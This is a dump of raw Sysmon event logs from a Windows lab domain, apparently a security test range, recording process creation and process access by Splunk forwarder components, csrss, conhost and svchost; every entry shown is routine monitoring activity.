10341000x800000000000000032664Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-36CA-6013-6503-00000000A401}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
10341000x800000000000000032663Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.835{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36CA-6013-6503-00000000A401}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
154100x800000000000000032662Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.836{FF16AF91-36CA-6013-6503-00000000A401}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x800000000000000032661Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.304{FF16AF91-36CA-6013-6403-00000000A401}27485824C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032660Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36CA-6013-6403-00000000A401}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032659Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032658Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032657Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032656Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032655Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-36CA-6013-6403-00000000A401}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
10341000x800000000000000032654Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.163{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36CA-6013-6403-00000000A401}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
154100x800000000000000032653Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:26.164{FF16AF91-36CA-6013-6403-00000000A401}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x800000000000000032678Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.507{FF16AF91-36CD-6013-6603-00000000A401}8367004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032677Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26C8-6013-3F00-00000000A401}29803196C:\Windows\system32\conhost.exe{FF16AF91-36CD-6013-6603-00000000A401}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032676Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032675Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032674Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032673Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26B6-6013-0C00-00000000A401}6121040C:\Windows\system32\svchost.exe{FF16AF91-26C7-6013-3300-00000000A401}3616C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x800000000000000032672Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26B4-6013-0500-00000000A401}644660C:\Windows\system32\csrss.exe{FF16AF91-36CD-6013-6603-00000000A401}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
10341000x800000000000000032671Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.366{FF16AF91-26C7-6013-3400-00000000A401}36964500C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FF16AF91-36CD-6013-6603-00000000A401}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
154100x800000000000000032670Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:12:29.367{FF16AF91-36CD-6013-6603-00000000A401}836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FF16AF91-26B5-6013-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{FF16AF91-26C7-6013-3400-00000000A401}3696C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
10341000x8000000000000000359970Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-36ce-6013-9303-000000001100}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359969Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359968Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359967Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359966Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000359965Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-36ce-6013-9303-000000001100}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000359964Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:30.957{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-36ce-6013-9303-000000001100}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
